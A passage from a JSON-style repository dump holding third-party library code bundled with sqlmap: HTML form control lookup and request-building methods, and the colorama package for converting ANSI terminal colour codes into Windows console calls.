add_file(self, file_object, content_type=None, filename=None,\n                 name=None, id=None, nr=None, label=None):\n        \"\"\"Add a file to be uploaded.\n\n        file_object: file-like object (with read method) from which to read\n         data to upload\n        content_type: MIME content type of data to upload\n        filename: filename to pass to server\n\n        If filename is None, no filename is sent to the server.\n\n        If content_type is None, the content type is guessed based on the\n        filename and the data from read from the file object.\n\n        XXX\n        At the moment, guessed content type is always application/octet-stream.\n        Use sndhdr, imghdr modules.  Should also try to guess HTML, XML, and\n        plain text.\n\n        Note the following useful HTML attributes of file upload controls (see\n        HTML 4.01 spec, section 17):\n\n        accept: comma-separated list of content types that the server will\n         handle correctly; you can use this to filter out non-conforming files\n        size: XXX IIRC, this is indicative of whether form wants multiple or\n         single files\n        maxlength: XXX hint of max content length in bytes?\n\n        \"\"\"\n        self.find_control(name, \"file\", id=id, label=label, nr=nr).add_file(\n            file_object, content_type, filename)\n\n#---------------------------------------------------\n# Form submission methods, applying only to clickable controls.\n\n    def click(self, name=None, type=None, id=None, nr=0, coord=(1,1),\n              request_class=_urllib.request.Request,\n              label=None):\n        \"\"\"Return request that would result from clicking on a control.\n\n        The request object is a _urllib.request.Request instance, which you can pass to\n        urllib2.urlopen (or ClientCookie.urlopen).\n\n        Only some control types (INPUT/SUBMIT & BUTTON/SUBMIT buttons and\n        IMAGEs) can be clicked.\n\n        Will click on the first clickable control, subject to the name, type\n        and nr arguments (as for find_control).  If no name, type, id or number\n        is specified and there are no clickable controls, a request will be\n        returned for the form in its current, un-clicked, state.\n\n        IndexError is raised if any of name, type, id or nr is specified but no\n        matching control is found.  ValueError is raised if the HTMLForm has an\n        enctype attribute that is not recognised.\n\n        You can optionally specify a coordinate to click at, which only makes a\n        difference if you clicked on an image.\n\n        \"\"\"\n        return self._click(name, type, id, label, nr, coord, \"request\",\n                           self._request_class)\n\n    def click_request_data(self,\n                           name=None, type=None, id=None,\n                           nr=0, coord=(1,1),\n                           request_class=_urllib.request.Request,\n                           label=None):\n        \"\"\"As for click method, but return a tuple (url, data, headers).\n\n        You can use this data to send a request to the server.  This is useful\n        if you're using httplib or urllib rather than urllib2.  Otherwise, use\n        the click method.\n\n        # Untested.  Have to subclass to add headers, I think -- so use urllib2\n        # instead!\n        import urllib\n        url, data, hdrs = form.click_request_data()\n        r = _urllib.request.urlopen(url, data)\n\n        # Untested.  I don't know of any reason to use httplib -- you can get\n        # just as much control with urllib2.\n        import httplib, urlparse\n        url, data, hdrs = form.click_request_data()\n        tup = urlparse(url)\n        host, path = tup[1], _urllib.parse.urlunparse((None, None)+tup[2:])\n        conn = httplib.HTTPConnection(host)\n        if data:\n            httplib.request(\"POST\", path, data, hdrs)\n        else:\n            httplib.request(\"GET\", path, headers=hdrs)\n        r = conn.getresponse()\n\n        \"\"\"\n        return self._click(name, type, id, label, nr, coord, \"request_data\",\n                           self._request_class)\n\n    def click_pairs(self, name=None, type=None, id=None,\n                    nr=0, coord=(1,1),\n                    label=None):\n        \"\"\"As for click_request_data, but returns a list of (key, value) pairs.\n\n        You can use this list as an argument to ClientForm.urlencode.  This is\n        usually only useful if you're using httplib or urllib rather than\n        urllib2 or ClientCookie.  It may also be useful if you want to manually\n        tweak the keys and/or values, but this should not be necessary.\n        Otherwise, use the click method.\n\n        Note that this method is only useful for forms of MIME type\n        x-www-form-urlencoded.  In particular, it does not return the\n        information required for file upload.  If you need file upload and are\n        not using urllib2, use click_request_data.\n\n        Also note that Python 2.0's urllib.urlencode is slightly broken: it\n        only accepts a mapping, not a sequence of pairs, as an argument.  This\n        messes up any ordering in the argument.  Use ClientForm.urlencode\n        instead.\n\n        \"\"\"\n        return self._click(name, type, id, label, nr, coord, \"pairs\",\n                           self._request_class)\n\n#---------------------------------------------------\n\n    def find_control(self,\n                     name=None, type=None, kind=None, id=None,\n                     predicate=None, nr=None,\n                     label=None):\n        \"\"\"Locate and return some specific control within the form.\n\n        At least one of the name, type, kind, predicate and nr arguments must\n        be supplied.  If no matching control is found, ControlNotFoundError is\n        raised.\n\n        If name is specified, then the control must have the indicated name.\n\n        If type is specified then the control must have the specified type (in\n        addition to the types possible for <input> HTML tags: \"text\",\n        \"password\", \"hidden\", \"submit\", \"image\", \"button\", \"radio\", \"checkbox\",\n        \"file\" we also have \"reset\", \"buttonbutton\", \"submitbutton\",\n        \"resetbutton\", \"textarea\", \"select\" and \"isindex\").\n\n        If kind is specified, then the control must fall into the specified\n        group, each of which satisfies a particular interface.  The types are\n        \"text\", \"list\", \"multilist\", \"singlelist\", \"clickable\" and \"file\".\n\n        If id is specified, then the control must have the indicated id.\n\n        If predicate is specified, then the control must match that function.\n        The predicate function is passed the control as its single argument,\n        and should return a boolean value indicating whether the control\n        matched.\n\n        nr, if supplied, is the sequence number of the control (where 0 is the\n        first).  Note that control 0 is the first control matching all the\n        other arguments (if supplied); it is not necessarily the first control\n        in the form.  If no nr is supplied, AmbiguityError is raised if\n        multiple controls match the other arguments (unless the\n        .backwards-compat attribute is true).\n\n        If label is specified, then the control must have this label.  Note\n        that radio controls and checkboxes never have labels: their items do.\n\n        \"\"\"\n        if ((name is None) and (type is None) and (kind is None) and\n            (id is None) and (label is None) and (predicate is None) and\n            (nr is None)):\n            raise ValueError(\n                \"at least one argument must be supplied to specify control\")\n        return self._find_control(name, type, kind, id, label, predicate, nr)\n\n#---------------------------------------------------\n# Private methods.\n\n    def _find_list_control(self,\n                           name=None, type=None, kind=None, id=None, \n                           label=None, nr=None):\n        if ((name is None) and (type is None) and (kind is None) and\n            (id is None) and (label is None) and (nr is None)):\n            raise ValueError(\n                \"at least one argument must be supplied to specify control\")\n\n        return self._find_control(name, type, kind, id, label, \n                                  is_listcontrol, nr)\n\n    def _find_control(self, name, type, kind, id, label, predicate, nr):\n        if ((name is not None) and (name is not Missing) and\n            not isstringlike(name)):\n            raise TypeError(\"control name must be string-like\")\n        if (type is not None) and not isstringlike(type):\n            raise TypeError(\"control type must be string-like\")\n        if (kind is not None) and not isstringlike(kind):\n            raise TypeError(\"control kind must be string-like\")\n        if (id is not None) and not isstringlike(id):\n            raise TypeError(\"control id must be string-like\")\n        if (label is not None) and not isstringlike(label):\n            raise TypeError(\"control label must be string-like\")\n        if (predicate is not None) and not callable(predicate):\n            raise TypeError(\"control predicate must be callable\")\n        if (nr is not None) and nr < 0:\n            raise ValueError(\"control number must be a positive integer\")\n\n        orig_nr = nr\n        found = None\n        ambiguous = False\n        if nr is None and self.backwards_compat:\n            nr = 0\n\n        for control in self.controls:\n            if ((name is not None and name != control.name) and\n                (name is not Missing or control.name is not None)):\n                continue\n            if type is not None and type != control.type:\n                continue\n            if kind is not None and not control.is_of_kind(kind):\n                continue\n            if id is not None and id != control.id:\n                continue\n            if predicate and not predicate(control):\n                continue\n            if label:\n                for l in control.get_labels():\n                    if l.text.find(label) > -1:\n                        break\n                else:\n                    continue\n            if nr is not None:\n                if nr == 0:\n                    return control  # early exit: unambiguous due to nr\n                nr -= 1\n                continue\n            if found:\n                ambiguous = True\n                break\n            found = control\n\n        if found and not ambiguous:\n            return found\n\n        description = []\n        if name is not None: description.append(\"name %s\" % repr(name))\n        if type is not None: description.append(\"type '%s'\" % type)\n        if kind is not None: description.append(\"kind '%s'\" % kind)\n        if id is not None: description.append(\"id '%s'\" % id)\n        if label is not None: description.append(\"label '%s'\" % label)\n        if predicate is not None:\n            description.append(\"predicate %s\" % predicate)\n        if orig_nr: description.append(\"nr %d\" % orig_nr)\n        description = \", \".join(description)\n\n        if ambiguous:\n            raise AmbiguityError(\"more than one control matching \"+description)\n        elif not found:\n            raise ControlNotFoundError(\"no control matching \"+description)\n        assert False\n\n    def _click(self, name, type, id, label, nr, coord, return_type,\n               request_class=_urllib.request.Request):\n        try:\n            control = self._find_control(\n                name, type, \"clickable\", id, label, None, nr)\n        except ControlNotFoundError:\n            if ((name is not None) or (type is not None) or (id is not None) or\n                (nr != 0)):\n                raise\n            # no clickable controls, but no control was explicitly requested,\n            # so return state without clicking any control\n            return self._switch_click(return_type, request_class)\n        else:\n            return control._click(self, coord, return_type, request_class)\n\n    def _pairs(self):\n        \"\"\"Return sequence of (key, value) pairs suitable for urlencoding.\"\"\"\n        return [(k, v) for (i, k, v, c_i) in self._pairs_and_controls()]\n\n\n    def _pairs_and_controls(self):\n        \"\"\"Return sequence of (index, key, value, control_index)\n        of totally ordered pairs suitable for urlencoding.\n\n        control_index is the index of the control in self.controls\n        \"\"\"\n        pairs = []\n        for control_index in xrange(len(self.controls)):\n            control = self.controls[control_index]\n            for ii, key, val in control._totally_ordered_pairs():\n                pairs.append((ii, key, val, control_index))\n\n        # stable sort by ONLY first item in tuple\n        pairs.sort()\n\n        return pairs\n\n    def _request_data(self):\n        \"\"\"Return a tuple (url, data, headers).\"\"\"\n        method = self.method.upper()\n        #scheme, netloc, path, parameters, query, frag = _urllib.parse.urlparse(self.action)\n        parts = self._urlparse(self.action)\n        rest, (query, frag) = parts[:-2], parts[-2:]\n\n        if method == \"GET\":\n            self.enctype = \"application/x-www-form-urlencoded\"  # force it\n            parts = rest + (urlencode(self._pairs()), None)\n            uri = self._urlunparse(parts)\n            return uri, None, []\n        elif method == \"POST\":\n            parts = rest + (query, None)\n            uri = self._urlunparse(parts)\n            if self.enctype == \"application/x-www-form-urlencoded\":\n                return (uri, urlencode(self._pairs()),\n                        [(\"Content-Type\", self.enctype)])\n            elif self.enctype == \"text/plain\":\n                return (uri, self._pairs(),\n                        [(\"Content-Type\", self.enctype)])\n            elif self.enctype == \"multipart/form-data\":\n                data = _cStringIO()\n                http_hdrs = []\n                mw = MimeWriter(data, http_hdrs)\n                f = mw.startmultipartbody(\"form-data\", add_to_http_hdrs=True,\n                                          prefix=0)\n                for ii, k, v, control_index in self._pairs_and_controls():\n                    self.controls[control_index]._write_mime_data(mw, k, v)\n                mw.lastpart()\n                return uri, data.getvalue(), http_hdrs\n            else:\n                raise ValueError(\n                    \"unknown POST form encoding type '%s'\" % self.enctype)\n        else:\n            raise ValueError(\"Unknown method '%s'\" % method)\n\n    def _switch_click(self, return_type, request_class=_urllib.request.Request):\n        # This is called by HTMLForm and clickable Controls to hide switching\n        # on return_type.\n        if return_type == \"pairs\":\n            return self._pairs()\n        elif return_type == \"request_data\":\n            return self._request_data()\n        else:\n            req_data = self._request_data()\n\n            req = request_class(req_data[0], req_data[1])\n            for key, val in req_data[2]:\n                add_hdr = req.add_header\n                if key.lower() == \"content-type\":\n                    try:\n                        add_hdr = req.add_unredirected_header\n                    except AttributeError:\n                        # pre-2.4 and not using ClientCookie\n                        pass\n                add_hdr(key, val)\n            return req\n"
  },
  {
    "path": "sqlmap/thirdparty/colorama/__init__.py",
    "content": "# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.\nfrom .initialise import init, deinit, reinit, colorama_text\nfrom .ansi import Fore, Back, Style, Cursor\nfrom .ansitowin32 import AnsiToWin32\n\n__version__ = '0.3.7'\n\n"
  },
  {
    "path": "sqlmap/thirdparty/colorama/ansi.py",
    "content": "# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.\n'''\nThis module generates ANSI character codes to printing colors to terminals.\nSee: http://en.wikipedia.org/wiki/ANSI_escape_code\n'''\n\nCSI = '\\033['\nOSC = '\\033]'\nBEL = '\\007'\n\n\ndef code_to_chars(code):\n    return CSI + str(code) + 'm'\n\ndef set_title(title):\n    return OSC + '2;' + title + BEL\n\ndef clear_screen(mode=2):\n    return CSI + str(mode) + 'J'\n\ndef clear_line(mode=2):\n    return CSI + str(mode) + 'K'\n\n\nclass AnsiCodes(object):\n    def __init__(self):\n        # the subclasses declare class attributes which are numbers.\n        # Upon instantiation we define instance attributes, which are the same\n        # as the class attributes but wrapped with the ANSI escape sequence\n        for name in dir(self):\n            if not name.startswith('_'):\n                value = getattr(self, name)\n                setattr(self, name, code_to_chars(value))\n\n\nclass AnsiCursor(object):\n    def UP(self, n=1):\n        return CSI + str(n) + 'A'\n    def DOWN(self, n=1):\n        return CSI + str(n) + 'B'\n    def FORWARD(self, n=1):\n        return CSI + str(n) + 'C'\n    def BACK(self, n=1):\n        return CSI + str(n) + 'D'\n    def POS(self, x=1, y=1):\n        return CSI + str(y) + ';' + str(x) + 'H'\n\n\nclass AnsiFore(AnsiCodes):\n    BLACK           = 30\n    RED             = 31\n    GREEN           = 32\n    YELLOW          = 33\n    BLUE            = 34\n    MAGENTA         = 35\n    CYAN            = 36\n    WHITE           = 37\n    RESET           = 39\n\n    # These are fairly well supported, but not part of the standard.\n    LIGHTBLACK_EX   = 90\n    LIGHTRED_EX     = 91\n    LIGHTGREEN_EX   = 92\n    LIGHTYELLOW_EX  = 93\n    LIGHTBLUE_EX    = 94\n    LIGHTMAGENTA_EX = 95\n    LIGHTCYAN_EX    = 96\n    LIGHTWHITE_EX   = 97\n\n\nclass AnsiBack(AnsiCodes):\n    BLACK           = 40\n    RED             = 41\n    GREEN           = 42\n    YELLOW          = 43\n    BLUE            = 44\n    MAGENTA         = 45\n    CYAN            = 46\n    WHITE           = 47\n    RESET           = 49\n\n    # These are fairly well supported, but not part of the standard.\n    LIGHTBLACK_EX   = 100\n    LIGHTRED_EX     = 101\n    LIGHTGREEN_EX   = 102\n    LIGHTYELLOW_EX  = 103\n    LIGHTBLUE_EX    = 104\n    LIGHTMAGENTA_EX = 105\n    LIGHTCYAN_EX    = 106\n    LIGHTWHITE_EX   = 107\n\n\nclass AnsiStyle(AnsiCodes):\n    BRIGHT    = 1\n    DIM       = 2\n    NORMAL    = 22\n    RESET_ALL = 0\n\nFore   = AnsiFore()\nBack   = AnsiBack()\nStyle  = AnsiStyle()\nCursor = AnsiCursor()\n"
  },
  {
    "path": "sqlmap/thirdparty/colorama/ansitowin32.py",
    "content": "# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.\nimport re\nimport sys\nimport os\n\nfrom .ansi import AnsiFore, AnsiBack, AnsiStyle, Style\nfrom .winterm import WinTerm, WinColor, WinStyle\nfrom .win32 import windll, winapi_test\n\n\nwinterm = None\nif windll is not None:\n    winterm = WinTerm()\n\n\ndef is_stream_closed(stream):\n    return not hasattr(stream, 'closed') or stream.closed\n\n\ndef is_a_tty(stream):\n    return hasattr(stream, 'isatty') and stream.isatty()\n\n\nclass StreamWrapper(object):\n    '''\n    Wraps a stream (such as stdout), acting as a transparent proxy for all\n    attribute access apart from method 'write()', which is delegated to our\n    Converter instance.\n    '''\n    def __init__(self, wrapped, converter):\n        # double-underscore everything to prevent clashes with names of\n        # attributes on the wrapped stream object.\n        self.__wrapped = wrapped\n        self.__convertor = converter\n\n    def __getattr__(self, name):\n        return getattr(self.__wrapped, name)\n\n    def write(self, text):\n        self.__convertor.write(text)\n\n\nclass AnsiToWin32(object):\n    '''\n    Implements a 'write()' method which, on Windows, will strip ANSI character\n    sequences from the text, and if outputting to a tty, will convert them into\n    win32 function calls.\n    '''\n    ANSI_CSI_RE = re.compile('\\001?\\033\\\\[((?:\\\\d|;)*)([a-zA-Z])\\002?')     # Control Sequence Introducer\n    ANSI_OSC_RE = re.compile('\\001?\\033\\\\]([^\\a]*)(\\a)\\002?')               # Operating System Command (Note: https://github.com/tartley/colorama/issues/247)\n\n    def __init__(self, wrapped, convert=None, strip=None, autoreset=False):\n        # The wrapped stream (normally sys.stdout or sys.stderr)\n        self.wrapped = wrapped\n\n        # should we reset colors to defaults after every .write()\n        self.autoreset = autoreset\n\n        # create the proxy wrapping our output stream\n        self.stream = StreamWrapper(wrapped, self)\n\n        on_windows = os.name == 'nt'\n        # We test if the WinAPI works, because even if we are on Windows\n        # we may be using a terminal that doesn't support the WinAPI\n        # (e.g. Cygwin Terminal). In this case it's up to the terminal\n        # to support the ANSI codes.\n        conversion_supported = on_windows and winapi_test()\n\n        # should we strip ANSI sequences from our output?\n        if strip is None:\n            strip = conversion_supported or (not is_stream_closed(wrapped) and not is_a_tty(wrapped))\n        self.strip = strip\n\n        # should we should convert ANSI sequences into win32 calls?\n        if convert is None:\n            convert = conversion_supported and not is_stream_closed(wrapped) and is_a_tty(wrapped)\n        self.convert = convert\n\n        # dict of ansi codes to win32 functions and parameters\n        self.win32_calls = self.get_win32_calls()\n\n        # are we wrapping stderr?\n        self.on_stderr = self.wrapped is sys.stderr\n\n    def should_wrap(self):\n        '''\n        True if this class is actually needed. If false, then the output\n        stream will not be affected, nor will win32 calls be issued, so\n        wrapping stdout is not actually required. This will generally be\n        False on non-Windows platforms, unless optional functionality like\n        autoreset has been requested using kwargs to init()\n        '''\n        return self.convert or self.strip or self.autoreset\n\n    def get_win32_calls(self):\n        if self.convert and winterm:\n            return {\n                AnsiStyle.RESET_ALL: (winterm.reset_all, ),\n                AnsiStyle.BRIGHT: (winterm.style, WinStyle.BRIGHT),\n                AnsiStyle.DIM: (winterm.style, WinStyle.NORMAL),\n                AnsiStyle.NORMAL: (winterm.style, WinStyle.NORMAL),\n                AnsiFore.BLACK: (winterm.fore, WinColor.BLACK),\n                AnsiFore.RED: (winterm.fore, WinColor.RED),\n                AnsiFore.GREEN: (winterm.fore, WinColor.GREEN),\n                AnsiFore.YELLOW: (winterm.fore, WinColor.YELLOW),\n                AnsiFore.BLUE: (winterm.fore, WinColor.BLUE),\n                AnsiFore.MAGENTA: (winterm.fore, WinColor.MAGENTA),\n                AnsiFore.CYAN: (winterm.fore, WinColor.CYAN),\n                AnsiFore.WHITE: (winterm.fore, WinColor.GREY),\n                AnsiFore.RESET: (winterm.fore, ),\n                AnsiFore.LIGHTBLACK_EX: (winterm.fore, WinColor.BLACK, True),\n                AnsiFore.LIGHTRED_EX: (winterm.fore, WinColor.RED, True),\n                AnsiFore.LIGHTGREEN_EX: (winterm.fore, WinColor.GREEN, True),\n                AnsiFore.LIGHTYELLOW_EX: (winterm.fore, WinColor.YELLOW, True),\n                AnsiFore.LIGHTBLUE_EX: (winterm.fore, WinColor.BLUE, True),\n                AnsiFore.LIGHTMAGENTA_EX: (winterm.fore, WinColor.MAGENTA, True),\n                AnsiFore.LIGHTCYAN_EX: (winterm.fore, WinColor.CYAN, True),\n                AnsiFore.LIGHTWHITE_EX: (winterm.fore, WinColor.GREY, True),\n                AnsiBack.BLACK: (winterm.back, WinColor.BLACK),\n                AnsiBack.RED: (winterm.back, WinColor.RED),\n                AnsiBack.GREEN: (winterm.back, WinColor.GREEN),\n                AnsiBack.YELLOW: (winterm.back, WinColor.YELLOW),\n                AnsiBack.BLUE: (winterm.back, WinColor.BLUE),\n                AnsiBack.MAGENTA: (winterm.back, WinColor.MAGENTA),\n                AnsiBack.CYAN: (winterm.back, WinColor.CYAN),\n                AnsiBack.WHITE: (winterm.back, WinColor.GREY),\n                AnsiBack.RESET: (winterm.back, ),\n                AnsiBack.LIGHTBLACK_EX: (winterm.back, WinColor.BLACK, True),\n                AnsiBack.LIGHTRED_EX: (winterm.back, WinColor.RED, True),\n                AnsiBack.LIGHTGREEN_EX: (winterm.back, WinColor.GREEN, True),\n                AnsiBack.LIGHTYELLOW_EX: (winterm.back, WinColor.YELLOW, True),\n                AnsiBack.LIGHTBLUE_EX: (winterm.back, WinColor.BLUE, True),\n                AnsiBack.LIGHTMAGENTA_EX: (winterm.back, WinColor.MAGENTA, True),\n                AnsiBack.LIGHTCYAN_EX: (winterm.back, WinColor.CYAN, True),\n                AnsiBack.LIGHTWHITE_EX: (winterm.back, WinColor.GREY, True),\n            }\n        return dict()\n\n    def write(self, text):\n        if self.strip or self.convert:\n            self.write_and_convert(text)\n        else:\n            self.wrapped.write(text)\n            self.wrapped.flush()\n        if self.autoreset:\n            self.reset_all()\n\n\n    def reset_all(self):\n        if self.convert:\n            self.call_win32('m', (0,))\n        elif not self.strip and not is_stream_closed(self.wrapped):\n            self.wrapped.write(Style.RESET_ALL)\n\n\n    def write_and_convert(self, text):\n        '''\n        Write the given text to our wrapped stream, stripping any ANSI\n        sequences from the text, and optionally converting them into win32\n        calls.\n        '''\n        cursor = 0\n        text = self.convert_osc(text)\n        for match in self.ANSI_CSI_RE.finditer(text):\n            start, end = match.span()\n            self.write_plain_text(text, cursor, start)\n            self.convert_ansi(*match.groups())\n            cursor = end\n        self.write_plain_text(text, cursor, len(text))\n\n\n    def write_plain_text(self, text, start, end):\n        if start < end:\n            self._write(text[start:end])\n            self.wrapped.flush()\n\n    # Reference: https://github.com/robotframework/robotframework/commit/828c67695d85519e4435c556c43ed1b00985df05\n    #  Workaround for Windows 10 console bug:\n    #  https://github.com/robotframework/robotframework/issues/2709\n    def _write(self, text, retry=5):\n        try:\n            self.wrapped.write(text)\n        except IOError as err:\n            if not (err.errno == 0 and retry > 0):\n                raise\n            self._write(text, retry-1)\n        except UnicodeError:\n            self.wrapped.write('?')\n\n    def convert_ansi(self, paramstring, command):\n        if self.convert:\n            params = self.extract_params(command, paramstring)\n            self.call_win32(command, params)\n\n\n    def extract_params(self, command, paramstring):\n        if command in 'Hf':\n            params = tuple(int(p) if len(p) != 0 else 1 for p in paramstring.split(';'))\n            while len(params) < 2:\n                # defaults:\n                params = params + (1,)\n        else:\n            params = tuple(int(p) for p in paramstring.split(';') if len(p) != 0)\n            if len(params) == 0:\n                # defaults:\n                if command in 'JKm':\n                    params = (0,)\n                elif command in 'ABCD':\n                    params = (1,)\n\n        return params\n\n\n    def call_win32(self, command, params):\n        if command == 'm':\n            for param in params:\n                if param in self.win32_calls:\n                    func_args = self.win32_calls[param]\n                    func = func_args[0]\n                    args = func_args[1:]\n                    kwargs = dict(on_stderr=self.on_stderr)\n                    func(*args, **kwargs)\n        elif command in 'J':\n            winterm.erase_screen(params[0], on_stderr=self.on_stderr)\n        elif command in 'K':\n            winterm.erase_line(params[0], on_stderr=self.on_stderr)\n        elif command in 'Hf':     # cursor position - absolute\n            winterm.set_cursor_position(params, on_stderr=self.on_stderr)\n        elif command in 'ABCD':   # cursor position - relative\n            n = params[0]\n            # A - up, B - down, C - forward, D - back\n            x, y = {'A': (0, -n), 'B': (0, n), 'C': (n, 0), 'D': (-n, 0)}[command]\n            winterm.cursor_adjust(x, y, on_stderr=self.on_stderr)\n\n\n    def convert_osc(self, text):\n        for match in self.ANSI_OSC_RE.finditer(text):\n            start, end = match.span()\n            text = text[:start] + text[end:]\n            paramstring, command = match.groups()\n            if command in '\\x07':       # \\x07 = BEL\n                params = paramstring.split(\";\")\n                # 0 - change title and icon (we will only change title)\n                # 1 - change icon (we don't support this)\n                # 2 - change title\n                if params[0] in '02':\n                    winterm.set_title(params[1])\n        return text\n"
  },
  {
    "path": "sqlmap/thirdparty/colorama/initialise.py",
    "content": "# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.\nimport atexit\nimport contextlib\nimport sys\n\nfrom .ansitowin32 import AnsiToWin32\n\n\norig_stdout = None\norig_stderr = None\n\nwrapped_stdout = None\nwrapped_stderr = None\n\natexit_done = False\n\n\ndef reset_all():\n    if AnsiToWin32 is not None:    # Issue #74: objects might become None at exit\n        AnsiToWin32(orig_stdout).reset_all()\n\n\ndef init(autoreset=False, convert=None, strip=None, wrap=True):\n    global wrapped_stdout, wrapped_stderr\n    global orig_stdout, orig_stderr\n\n    if orig_stdout is not None:\n        return\n\n    if not wrap and any([autoreset, convert, strip]):\n        raise ValueError('wrap=False conflicts with any other arg=True')\n\n    orig_stdout = sys.stdout\n    orig_stderr = sys.stderr\n\n    if sys.stdout is None:\n        wrapped_stdout = None\n    else:\n        sys.stdout = wrapped_stdout = \\\n            wrap_stream(orig_stdout, convert, strip, autoreset, wrap)\n    if sys.stderr is None:\n        wrapped_stderr = None\n    else:\n        sys.stderr = wrapped_stderr = \\\n            wrap_stream(orig_stderr, convert, strip, autoreset, wrap)\n\n    global atexit_done\n    if not atexit_done:\n        atexit.register(reset_all)\n        atexit_done = True\n\n\ndef deinit():\n    global orig_stdout\n    global orig_stderr\n\n    if orig_stdout is not None:\n        sys.stdout = orig_stdout\n        orig_stdout = None\n    if orig_stderr is not None:\n        sys.stderr = orig_stderr\n        orig_stderr = None\n\n\n@contextlib.contextmanager\ndef colorama_text(*args, **kwargs):\n    init(*args, **kwargs)\n    try:\n        yield\n    finally:\n        deinit()\n\n\ndef reinit():\n    if wrapped_stdout is not None:\n        sys.stdout = wrapped_stdout\n    if wrapped_stderr is not None:\n        sys.stderr = wrapped_stderr\n\n\ndef wrap_stream(stream, convert, strip, autoreset, wrap):\n    if wrap:\n        wrapper = AnsiToWin32(stream,\n            convert=convert, strip=strip, autoreset=autoreset)\n        if wrapper.should_wrap():\n            stream = wrapper.stream\n    return stream\n\n\n"
  },
  {
    "path": "sqlmap/thirdparty/colorama/win32.py",
    "content": "# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.\n\n# from winbase.h\nSTDOUT = -11\nSTDERR = -12\n\ntry:\n    import ctypes\n    from ctypes import LibraryLoader\n    windll = LibraryLoader(ctypes.WinDLL)\n    from ctypes import wintypes\nexcept (AttributeError, ImportError):\n    windll = None\n    SetConsoleTextAttribute = lambda *_: None\n    winapi_test = lambda *_: None\nelse:\n    from ctypes import byref, Structure, c_char, POINTER\n\n    COORD = wintypes._COORD\n\n    class CONSOLE_SCREEN_BUFFER_INFO(Structure):\n        \"\"\"struct in wincon.h.\"\"\"\n        _fields_ = [\n            (\"dwSize\", COORD),\n            (\"dwCursorPosition\", COORD),\n            (\"wAttributes\", wintypes.WORD),\n            (\"srWindow\", wintypes.SMALL_RECT),\n            (\"dwMaximumWindowSize\", COORD),\n        ]\n        def __str__(self):\n            return '(%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d)' % (\n                self.dwSize.Y, self.dwSize.X\n                , self.dwCursorPosition.Y, self.dwCursorPosition.X\n                , self.wAttributes\n                , self.srWindow.Top, self.srWindow.Left, self.srWindow.Bottom, self.srWindow.Right\n                , self.dwMaximumWindowSize.Y, self.dwMaximumWindowSize.X\n            )\n\n    _GetStdHandle = windll.kernel32.GetStdHandle\n    _GetStdHandle.argtypes = [\n        wintypes.DWORD,\n    ]\n    _GetStdHandle.restype = wintypes.HANDLE\n\n    _GetConsoleScreenBufferInfo = windll.kernel32.GetConsoleScreenBufferInfo\n    _GetConsoleScreenBufferInfo.argtypes = [\n        wintypes.HANDLE,\n        POINTER(CONSOLE_SCREEN_BUFFER_INFO),\n    ]\n    _GetConsoleScreenBufferInfo.restype = wintypes.BOOL\n\n    _SetConsoleTextAttribute = windll.kernel32.SetConsoleTextAttribute\n    _SetConsoleTextAttribute.argtypes = [\n        wintypes.HANDLE,\n        wintypes.WORD,\n    ]\n    _SetConsoleTextAttribute.restype = wintypes.BOOL\n\n    _SetConsoleCursorPosition = windll.kernel32.SetConsoleCursorPosition\n    _SetConsoleCursorPosition.argtypes = [\n        wintypes.HANDLE,\n        COORD,\n    ]\n    _SetConsoleCursorPosition.restype = wintypes.BOOL\n\n    _FillConsoleOutputCharacterA = windll.kernel32.FillConsoleOutputCharacterA\n    _FillConsoleOutputCharacterA.argtypes = [\n        wintypes.HANDLE,\n        c_char,\n        wintypes.DWORD,\n        COORD,\n        POINTER(wintypes.DWORD),\n    ]\n    _FillConsoleOutputCharacterA.restype = wintypes.BOOL\n\n    _FillConsoleOutputAttribute = windll.kernel32.FillConsoleOutputAttribute\n    _FillConsoleOutputAttribute.argtypes = [\n        wintypes.HANDLE,\n        wintypes.WORD,\n        wintypes.DWORD,\n        COORD,\n        POINTER(wintypes.DWORD),\n    ]\n    _FillConsoleOutputAttribute.restype = wintypes.BOOL\n\n    _SetConsoleTitleW = windll.kernel32.SetConsoleTitleA\n    _SetConsoleTitleW.argtypes = [\n        wintypes.LPCSTR\n    ]\n    _SetConsoleTitleW.restype = wintypes.BOOL\n\n    handles = {\n        STDOUT: _GetStdHandle(STDOUT),\n        STDERR: _GetStdHandle(STDERR),\n    }\n\n    def winapi_test():\n        handle = handles[STDOUT]\n        csbi = CONSOLE_SCREEN_BUFFER_INFO()\n        success = _GetConsoleScreenBufferInfo(\n            handle, byref(csbi))\n        return bool(success)\n\n    def GetConsoleScreenBufferInfo(stream_id=STDOUT):\n        handle = handles[stream_id]\n        csbi = CONSOLE_SCREEN_BUFFER_INFO()\n        success = _GetConsoleScreenBufferInfo(\n            handle, byref(csbi))\n        return csbi\n\n    def SetConsoleTextAttribute(stream_id, attrs):\n        handle = handles[stream_id]\n        return _SetConsoleTextAttribute(handle, attrs)\n\n    def SetConsoleCursorPosition(stream_id, position, adjust=True):\n        position = COORD(*position)\n        # If the position is out of range, do nothing.\n        if position.Y <= 0 or position.X <= 0:\n            return\n        # Adjust for Windows' SetConsoleCursorPosition:\n        #    1. being 0-based, while ANSI is 1-based.\n        #    2. expecting (x,y), while ANSI uses (y,x).\n        adjusted_position = COORD(position.Y - 1, position.X - 1)\n        if adjust:\n            # Adjust for viewport's scroll position\n            sr = GetConsoleScreenBufferInfo(STDOUT).srWindow\n            adjusted_position.Y += sr.Top\n            adjusted_position.X += sr.Left\n        # Resume normal processing\n        handle = handles[stream_id]\n        return _SetConsoleCursorPosition(handle, adjusted_position)\n\n    def FillConsoleOutputCharacter(stream_id, char, length, start):\n        handle = handles[stream_id]\n        char = c_char(char.encode())\n        length = wintypes.DWORD(length)\n        num_written = wintypes.DWORD(0)\n        # Note that this is hard-coded for ANSI (vs wide) bytes.\n        success = _FillConsoleOutputCharacterA(\n            handle, char, length, start, byref(num_written))\n        return num_written.value\n\n    def FillConsoleOutputAttribute(stream_id, attr, length, start):\n        ''' FillConsoleOutputAttribute( hConsole, csbi.wAttributes, dwConSize, coordScreen, &cCharsWritten )'''\n        handle = handles[stream_id]\n        attribute = wintypes.WORD(attr)\n        length = wintypes.DWORD(length)\n        num_written = wintypes.DWORD(0)\n        # Note that this is hard-coded for ANSI (vs wide) bytes.\n        return 